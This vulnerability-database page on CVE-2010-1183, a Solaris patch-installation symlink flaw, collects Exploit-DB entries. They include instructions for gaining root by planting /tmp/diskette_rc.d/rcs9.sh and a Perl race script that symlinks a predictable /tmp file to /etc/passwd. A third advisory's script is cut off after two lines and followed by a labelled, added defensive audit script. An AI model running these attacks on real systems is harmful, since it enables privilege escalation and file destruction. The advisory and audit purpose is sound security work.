CVE-2010-1183
Published 2010-03-29
Priority: P4 · 15 · low · CVSS 2.0: 3.3
Vector: AV:L/AC:M/Au:N/C:P/I:P/A:N
EXPLOIT
EPSS: 0.49% (38.6th percentile)
Certain patch-installation scripts in Oracle Solaris allow local users to append data to arbitrary files via a symlink attack on the /tmp/CLEANUP temporary file, related to use of Update Manager.
No detection rules found.
Exploit-DB
Solaris Recommended Patch Cluster 6/19 (x86) - Local Privilege Escalation
exploitdb·2013-07-09
---
Solaris Recommended Patch Cluster 6/19 local root on x86
Larry W. Cashdollar
7/3/2013
@_larry0
If the system administrator is updating the system using update manager or smpatch (multi user mode) a local user could execute commands as root. This only affects x86 systems as this code resides under a case statement checking that the platform is intel based.
Local root:
Write to /tmp/diskette_rc.d/rcs9.sh before execution and you can execute commands as root.
./144751-01/SUNWos86r/install/postinstall
    if [ -s /tmp/diskette_rc.d/rcs9.sh ]
    then
        /sbin/sh /tmp/diskette_rc.d/rcs9.sh "post"
    fi
Inject entries into driver_aliases, research config file? maybe we can load our own library/driver?
804
Exploit-DB
Solaris 10 Patch 137097-01 - Symlink Privilege Escalation
exploitdb·2012-08-11
---
source: https://www.securityfocus.com/bid/54919/info
Solaris 10 Patch 137097-01 is prone to a local privilege-escalation vulnerability.
Local attackers can exploit this issue to gain elevated privileges on affected computers.
#!/usr/bin/perl
$clobber = "/etc/passwd";
while(1) {
open ps,"ps -ef | grep -v grep |grep -v PID |";
while(<ps>) {
@args = split " ", $_;
if (/inetd-upgrade/) {
print "Symlinking iconf_entries.$args[1] to $clobber\n";
symlink($clobber,"/tmp/iconf_entries.$args[1]");
exit(1);
}
}
}
Exploit-DB
Sun Connection Update Manager for Solaris - Multiple Insecure Temporary File Creation Vulnerabilities
exploitdb·2010-03-24
---
source: https://www.securityfocus.com/bid/38928/info
Sun Connection Update Manager for Solaris creates temporary files in an insecure manner.
An attacker with local access could potentially exploit these issues to perform symbolic-link attacks, overwriting arbitrary files in the context of the affected application.
Successfully mounting a symlink attack may allow the attacker to overwrite or corrupt sensitive files, which may result in a denial-of-service or privilege escalation. Other attacks may also be possible.
These issues affect unknown versions of the application. In addition, these issues may affect certain Solaris patch clusters or individual patch releases.
#!/bin/sh
#
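An added example, not part of the original page or of any Solaris patch: a small sh audit that lists every literal /tmp path a patch-installation script reads, writes or executes, which is the pattern behind /tmp/CLEANUP, /tmp/diskette_rc.d/rcs9.sh and /tmp/iconf_entries.<pid> in the entries above. The function names audit_tmp_paths and write_sample and the sample script are constructed for illustration.

```shell
#!/bin/sh
# Added example: audit a patch-installation script for fixed /tmp paths.

# audit_tmp_paths FILE
# Prints "LINE:PATH" for each literal /tmp/... path on a non-comment line.
# A PID suffix ($$) is still reported: the PID is visible in ps output,
# so the final name is predictable to any local user.
audit_tmp_paths() {
    awk '
        /^[ \t]*#/ { next }    # skip comment lines and the shebang
        {
            rest = $0
            while (match(rest, "/tmp/[A-Za-z0-9_.$/-]+")) {
                print NR ":" substr(rest, RSTART, RLENGTH)
                rest = substr(rest, RSTART + RLENGTH)
            }
        }
    ' "$1"
}

# write_sample FILE
# Writes a constructed install script that imitates the patterns quoted on
# this page; it is not taken from any real patch.
write_sample() {
    cat > "$1" <<'EOF'
#!/bin/sh
# constructed sample
echo "cleanup entry" >> /tmp/CLEANUP
if [ -s /tmp/diskette_rc.d/rcs9.sh ]
then
    /sbin/sh /tmp/diskette_rc.d/rcs9.sh "post"
fi
cat entries > /tmp/iconf_entries.$$
WORK=`mktemp -d` || exit 1
echo ok > "$WORK/state"
EOF
}

# Demo: the sample goes into a mktemp file, never a fixed /tmp name.
sample=$(mktemp) || exit 1
write_sample "$sample"
audit_tmp_paths "$sample"
rm -f "$sample"
```

Each reported line is a candidate for replacement with a private directory obtained from mktemp -d, as the last two lines of the sample do.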
No writeups or analysis indexed.
http://www.securityfocus.com/archive/1/510305/100/0/threaded
http://www.securityfocus.com/archive/1/510311/100/0/threaded
http://www.securityfocus.com/bid/38928
https://exchange.xforce.ibmcloud.com/vulnerabilities/57149
Published: 2010-03-29